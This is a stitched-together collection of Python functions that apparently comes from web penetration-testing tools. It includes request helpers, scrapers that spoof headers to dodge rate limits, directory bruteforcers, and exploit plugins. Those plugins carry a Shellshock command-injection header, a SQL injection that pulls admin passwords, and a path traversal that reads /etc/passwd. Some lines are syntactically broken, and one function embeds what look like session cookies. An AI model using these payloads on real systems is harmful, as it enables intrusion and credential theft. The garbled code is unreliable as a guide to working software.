def dnslog_cn(): headers_dnslog = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36', 'Host': '', 'Cookie': 'UM_distinctid=1703200149e449-053d4e8089c385-741a3944-1fa400-1703200149f80a; PHPSESSID=jfhfaj7op8u8i5sif6d4ai30j4; CNZZDATA1278305074=1095383570-1581386830-null%7C1581390548', 'Accept': '*/*', 'Referer': '', 'Accept-Language': 'zh-CN,zh;q=0.9', 'Connection': 'close' } dnslog_api = "" d_p = globals.get_value("DNS_DNSLOG_HOST") try: if d_p is None: dns = requests.get(dnslog_api, headers=headers_dnslog, timeout=timeout, verify=False) dns_host = random_md5() + "." + dns.text globals.set_value("DNS_DNSLOG_HOST", dns.text) return dns_host else: dns_host = random_md5() + "." + globals.get_value( "DNS_DNSLOG_HOST") return dns_host except Exception: return "error"
def _search(self, params): ''' Request with specified param, parse the response html document. @params: params: the query params @returns: return the search result, result format is: [[titel,url,brief-information],[...]...] ''' for i in xrange(self.retry): #use delay time and random user-agent to bypass IP restrict policy delayTime = random.randint(1,3) time.sleep(delayTime) userAgent = self.userAgents[random.randint(0,len(self.userAgents))-1] xforward = "192.168.3." + str(random.randint(1,255)) headers = {"User-Agent":userAgent, "X-Forward-For":xforward, "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3"} try: response = http.get(self.url, headers=headers, params=params) except http.RequestException as error: continue # 如果findSignature没有找到,则可能说明触发了搜索引擎的IP限制策略,此时retry;如果找到则无需retry if self.findSignature in response.text: for item in self._parseHtml(response.text): yield item break elif self.notFindSignature in response.text: raise StopIteration() else: raise StopIteration()
def _checkPath(self, path, pattern): url = self.baseURL + path try: #response = http.get(url) response = http.get(url, allow_redirects=False) except http.ConnectionError as error: self.log.debug("Checking '{0}' failed, connection failed".format(url)) return False if response.status_code == 200: if self.notFoundPattern: if self.notFoundPattern in response.content: self.log.debug("Checking '{0}' failed, notFoundPattern matchs.".format(url)) return False #if response.history: # if self.notFoundPattern in response.history[0].content: # self.log.debug("Checking '{0}' failed, notFoundPattern matchs.".format(url)) # return False if not pattern: self.log.debug("Checking '{0}' success, status code 200.".format(url)) return True else: if pattern in response.text: self.log.debug("Checking '{0}' success, status code 200, match pattern {1}.".format(url,pattern)) return True else: self.log.debug("Checking '{0}' failed, pattern not found.".format(url)) return False else: self.log.debug("Checking '{0}' failed, status code {1}".format(url, response.status_code)) return False
def _response_for(self, path): uri = "/".join([self._base_uri, path]) response = requests.get(uri, headers=self._headers) if response.status_code == 200: body = self._handle_success(response, uri) return body else: self._handle_error(response, uri)
def _http_conn(url): try: timeout = globals.get_value("TIMEOUT") # 获取全局变量TIMEOUT headers = globals.get_value("HEADERS") target = url_check(url) requests.get(target, timeout=timeout, headers=headers, verify=False) return "s" except requests.exceptions.ConnectionError: return "f" except requests.exceptions.Timeout: return "f" # add by @zilong3033 fix url extract except requests.exceptions.InvalidURL: return "f"
def verify(self): re_pattern = re.compile(r'~~~(.*?)~~~', re.IGNORECASE | re.DOTALL | re.MULTILINE) exp_headers = {'user-agent': r'''() { :; }; echo; echo ~~~`id`~~~'''} try: response = requests.get(self.option.url, headers=exp_headers, verify=False) except Exception, e: self.result.error = str(e) return
def get_page_size(self, url): try: req = requests.get(url, timeout=self.timeout) # 有时候没有content-length这个键 page_size = int(req.headers["content-length"]) if "content-length" in req.headers else len(req.content) return page_size except Exception, e: log.output_log("[error] " + str(e), True) return 0
def confirm_sucess(self): req = requests.get(self.API_URL) d = req.json() try: name = d['data'][0]['name'] if self.BANNER in name: return True except Exception: return False
def sendRequest(self, cookies="", agent=""): cookies = cookies User_Agent = agent if agent is not "" else "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" header = {"User-Agent": User_Agent, "Cookie": cookies} for url in self.UrlList: res = requests.get(url, headers=header) if res.status_code != 404: self.table.append(url) return str(self.table)
def get_page_size(self, url): try: req = requests.get(url, timeout=self.timeout) # 有时候没有content-length这个键 page_size = int(req.headers["content-length"]) if "content-length" in req.headers else len(req.content) return page_size except Exception, e: log.output_log("".join(["[error] ", str(e)]), True) return 0
def get_server_info(self, url): server_info = {} try: req = requests.get(url, timeout=self.timeout) status_code, server_type, web_type = req.status_code, req.headers['server'], req.headers["x-powered-by"] server_info.setdefault("status_code", status_code) server_info.setdefault("server", server_type) server_info.setdefault("x-powered-by", web_type) except Exception, e: print str(e)
def exploit(self): re_pattern = re.compile(r'~~~(.*?)~~~', re.IGNORECASE | re.DOTALL | re.MULTILINE) exp_headers = { 'user-agent': '() {{ :; }}; echo; echo ~~~`{command}`~~~'.format(command=self.option.cmd) } try: response = requests.get(self.option.url, headers=exp_headers, verify=False) except Exception, e: self.result.error = str(e) return
def _initMetaInfo(self): self._metaInfo['url'] = self._url self._metaInfo['target'] = self._target try: response = http.get(self._target.uri) except http.ConnectionError: raise PenError("Can not connect to {0}".format(self._target.uri)) else: self._metaInfo['statusCode'] = response.status_code self._metaInfo['headers'] = response.headers self._metaInfo['html'] = response.content self._metaInfo['title'] = self._getTitle(response.content) self._metaInfo['robots'] = "" try: response = http.get(self._target.baseURL+"robots.txt") except http.ConnectionError: pass else: if response.status_code == 200: self._metaInfo['robots'] = response.content
def verify(self): self.print_debug("verify start") re_version_pattern = re.compile(r'~~~(.+?)~~~', re.IGNORECASE | re.DOTALL | re.MULTILINE) cookies = {'cookie': 'admin'} exp_url = ("{domain}/php/bill/list_userinfo.php? union " "select concat(0x7e7e7e,@@version,0x7e7e7e),2,3,4,5%23".format(domain=self.option.url)) try: response = requests.get(exp_url, cookies=cookies, timeout=15, verify=False) except Exception, e: self.result.error = str(e) return
def exploit(self): self.print_debug("exploit start") re_userinfo_pattern = re.compile(r'~~~(\w+?)\|\|\|(\w+?)~~~', re.IGNORECASE | re.DOTALL | re.MULTILINE) cookies = {'cookie': 'admin'} exp_url = ("{domain}/php/bill/list_userinfo.php? union select concat(0x7e7e7e," "oid,0x7c7c7c,password,0x7e7e7e),2,3,4,5 from admininfo%23".format(domain=self.option.url)) try: response = requests.get(exp_url, cookies=cookies, timeout=15, verify=False) except Exception, e: self.result.error = str(e) return
def http_request_get(url, body_content_workflow=0,stream=False): trycnt = 0 headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36', 'Referer': url, 'X-CSRF-Token': 'gq+Gnl4JMKKOhALUqNUwZmVBQvEPr7GwB83R26v4SRo=', 'Cookie': 'Hm_lvt_c12f88b5c1cd041a732dea597a5ec94c=1445508519,1447835208; bdshare_firstime=1406012352921; __cfduid=d332bae9f4e8436979014dc2898aadb521427525951; PHPSESSID=grsutmbkjv942rgdvot3j8jd25; wy_uid=4a16IUdtWwwtFHCYfHaWUq1GsXLBZ7Nt7obf4Ww6q4Ry; wy_pwd=d437Bj2YxrEN8YXL7zLZ3%2FAwIHu00E1CdXktJy6K4421FwRmhRX%2BFVpqBDmgZ7jPV7RvIfZfodBrSEdYBA; wy_token=3dd1db3721a539c70e82f84e24407515; Hm_lpvt_c12f88b5c1cd041a732dea597a5ec94c=1447835243'} while True: try: if body_content_workflow == 1: result = requests.get(url, stream=True, headers=headers, timeout=timeout, proxies=proxies, verify=False) return result else: result = requests.get(url, headers=headers, timeout=timeout, proxies=proxies, verify=False) return result except Exception, e: # print 'Exception: %s' % e trycnt += 1 if trycnt >= retry_cnt: # print 'retry overflow' return False
def check_site_dir(self, site_root): while True: test_dir = self.get_payload() if test_dir is None: break test_url = site_root + test_dir try: req = requests.get(test_url, headers=self.headers, cookies=None, timeout=3) status_code = req.status_code status = self.status_codes[str(status_code)][0] \ if str(status_code) in self.status_codes else "Undefined" self.result_dispose("[site_dir][%d][%s]%s" % (status_code, str(status), test_url)) except Exception, e: log.output_log("[error] " + str(e), True) pass
def get_page_source(self, url, headers, cookies, times=0): if times < 3: try: req = requests.get(url, headers=headers, cookies=cookies, timeout=self.timeout) if req.status_code == 200: html = req.text req.close() return html if req.status_code == 403: times += 1 log.output_log("[error] 403 and try to connet %d" % times, True) proxy_switch.link_proxy(self.proxy) self.get_page_source_info(url, headers, cookies, times) return None except Exception, e: log.output_log("".join(["[error] ", str(e)]), True) return None
def request(self, path): i = 0 proxy = None result = None while i <= self.maxRetries: try: if self.proxy is not None: proxy = {"https" : self.proxy, "http" : self.proxy} url = "{0}://{1}:{2}".format(self.protocol,, self.port) url = urllib.parse.urljoin(url, self.basePath) # Joining with concatenation because a urljoin bug with "::" if not url.endswith('/'): url += "/" if path.startswith('/'): path = path[1:] #print(path) url += path headers = dict(self.headers) if self.randomAgents is not None: headers["User-agent"] = random.choice(self.randomAgents) #print(url) response = requests.get(url, proxies=proxy, verify=False, allow_redirects=self.redirect, \ headers=headers, timeout=self.timeout) result = Response(response.status_code, response.reason, response.headers, response.content) del headers break except requests.exceptions.ConnectionError as e: if self.proxy is not None: raise RequestException({'message': 'Error with the proxy: {0}'.format(e)}) continue except (requests.exceptions.ReadTimeout, requests.exceptions.Timeout, http.client.IncompleteRead, \ socket.timeout): continue finally: i = i + 1 if i > self.maxRetries: raise RequestException(\ {'message': 'CONNECTION TIMEOUT: There was a problem in the request to: {0}'.format(path)} ) return result
def verify(self): try: host = self.option.url PluginList = ['head','test','kopf', 'HQ', 'marvel', 'bigdesk'] port = 9200 fpath = '/etc/passwd' re_result_info='' try: for plugin in PluginList: exp_url = ("{domain}:9200/_plugin/{plugin}/../../../../../../../../..{fpath}".format(domain=self.option.url,plugin=plugin,fpath=fpath)) response = requests.get(exp_url,timeout=15, verify=False) if(-1!=response.content.find("root")): self.option.cmd = "root" self.result.status = True self.result.status = True = '/etc/passwd' break except Exception,e: print "[-] Error connecting to %s:%s" % (host,e) sys.exit() except Exception, e: self.result.error = str(e) return
def bruteforce(self, baseURL, notFoundPattern=None, safeURL=None, timeout=10, delay=0): ''' 爆破 ''' baseURL = URL.getURI(baseURL) keyword = self._getKeywordFromURL(baseURL) if keyword: self.keywords.append(keyword) matchs = [] baseURL = baseURL.rstrip("/") for line in self._dictIter(): time.sleep(delay) self._safeRequest(safeURL) url = baseURL.rstrip("/") + line try: self.log.debug(u"request url '{0}'".format(url)) #response = http.get(url, timeout=timeout) response = http.get(url, timeout=timeout, allow_redirects=False) except http.ConnectionError: continue if response.status_code == 200: if notFoundPattern: if notFoundPattern in response.content: continue #if response.history: # if notFoundPattern in response.history[0].content: # continue else: self.log.debug(u"find available url '{0}'".format(url)) matchs.append(url) else: continue return matchs